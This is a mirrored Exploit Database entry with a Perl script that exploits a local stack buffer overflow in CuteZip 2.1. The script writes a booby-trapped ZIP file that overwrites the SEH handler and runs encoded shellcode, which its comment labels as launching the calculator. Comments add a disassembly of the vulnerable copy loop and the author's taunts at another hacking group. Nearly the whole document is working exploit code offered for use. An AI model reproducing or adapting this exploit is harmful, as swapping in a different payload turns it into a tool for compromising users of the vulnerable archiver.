CuteZip 2.1 – Local Buffer Overflow

• Exploit Database
• 113 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-02-12
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16162/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176

  #!/usr/bin/perl # #[+]Exploit Title: Exploit Buffer Overflow CuteZip 2.1 #[+]Date: 02\12\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.globalscape.com/files/cutezip20b.exe #[+]Version: 2.1 build 9.24.1 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # #Comment in Brazilian Portuguese # || # || # \/ # #Comentario para quem é do Brasil: # #Ola Lammers Brasileiros Copiando Receitas de Bolos na internet né, #Um Bando de Lammers que dizem ser o Metasploit Brazil #Caras Voces Nao sabem nem Programar em ruby,perl,python,c ou java #Estude muito,nao suje o no do Metasploit. # #Esse Recado foi para o Metasploit Brasil se tiver Achando Ruim #Me Contate por E-mail. # # # #Comment: # # The structure of this exploit has zip Copied exploits of the team Corelan # Link: http://www.exploit-db.com/exploits/11764/ # # # Vulnerable function # || # || # \/ # # 0x0047CC0E .^72 CCJB SHORT CuteZip.0047CBDC # 0x0047CC10 . F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> # 0x0047CC12 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8] # 0x0047CC19 8D49 00LEA ECX,DWORD PTR DS:[ECX] # 0x0047CC1C > 23D1 AND EDX,ECX # 0x0047CC1E . 8A06 MOV AL,BYTE PTR DS:[ESI] # 0x0047CC20 . 8807 MOV BYTE PTR DS:[EDI],AL # 0x0047CC22 . 8A46 01MOV AL,BYTE PTR DS:[ESI+1] # 0x0047CC25 . C1E9 02SHR ECX,2 # 0x0047CC28 . 8847 01MOV BYTE PTR DS:[EDI+1],AL # 0x0047CC2B . 83C6 02ADD ESI,2 # 0x0047CC2E . 83C7 02ADD EDI,2 # 0x0047CC31 . 83F9 08CMP ECX,8 # 0x0047CC34 .^72 A6JB SHORT CuteZip.0047CBDC # 0x0047CC36 . F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>===> //Here is the function that occurs Buffer Overflow # 0x0047CC38 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8] # 0x0047CC3F 90 NOP # 0x0047CC40 > 23D1 AND EDX,ECX # 0x0047CC42 . 8A06 MOV AL,BYTE PTR DS:[ESI] # 0x0047CC44 . 8807 MOV BYTE PTR DS:[EDI],AL # 0x0047CC46 . 46 INC ESI # 0x0047CC47 . C1E9 02SHR ECX,2 # 0x0047CC4A . 47 INC EDI # 0x0047CC4B . 83F9 08CMP ECX,8 # 0x0047CC4E .^72 8CJB SHORT CuteZip.0047CBDC # 0x0047CC50 . F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> # 0x0047CC52 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8] # 0x0047CC59 8D49 00LEA ECX,DWORD PTR DS:[ECX] # # # # # # #     use IO::File;   if($^O=="windows") { system("cls"); system("color 4f"); } else { system("clear"); }     sub banner { print q{   [+]Exploit: Exploit Buffer Overflow CuteZip 2.1 [+]Date: 02\\12\\2011 [+]Author: C4SS!0 G0M3S [+]Home: www.invasao.com.br [+]E-mail: Louredo_@hotmail.com [+]Version: 2.1 build 9.24.1 [+]Thanks: Corelan Team, Skylined [+]Impact: Hich   }; } my $file = $ARGV[0];     if($#ARGV!=0) { banner; print "[-]Usage: $0 <File Name>\n"; print "[-]Exemple: $0 Exploit.zip\n";   exit(0); } banner;   my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00" . "\xe4\x0f" . "\x00\x00\x00";   my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00";   my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00";   my $payload = "\x41" x 1148; my $nseh = "\xeb\x07\x90\x90"; my $seh = pack(&apos;V&apos;,0x0040112F);   my $egg = "\x41" x 2; $egg .= "\x61\x61\x61\x51\x58\xFF\xD0";   my $shellcode = "\x41" x 123;   print "[*]Identifying the length Shellcode\n"; sleep(1);   $shellcode = $shellcode. "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L". "41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912". "6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0); "KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL". "VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK". "HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB". "K4BX0S5LKNQX14OM8646B9CZOA";   print "[*]The length is Shellcode:".(length($shellcode)-123)."\n"; sleep(1);   my $junk = "\x42" x (4064-length($payload.$nseh.$seh.$egg.$shellcode));   $payload = $payload.$nseh.$seh.$egg.$shellcode.$junk;   $payload = $payload.".txt"; my $Exploit = $ldf_header.$payload. $cdf_header.$payload. $eofcdf_header; print "[*]Creating the file $file\n"; sleep(1);   open(f,">$file")|| die("Error:\n$!\n"); print f $Exploit; close(f); print "[*]The File $file Created Successfully\n"; sleep(1);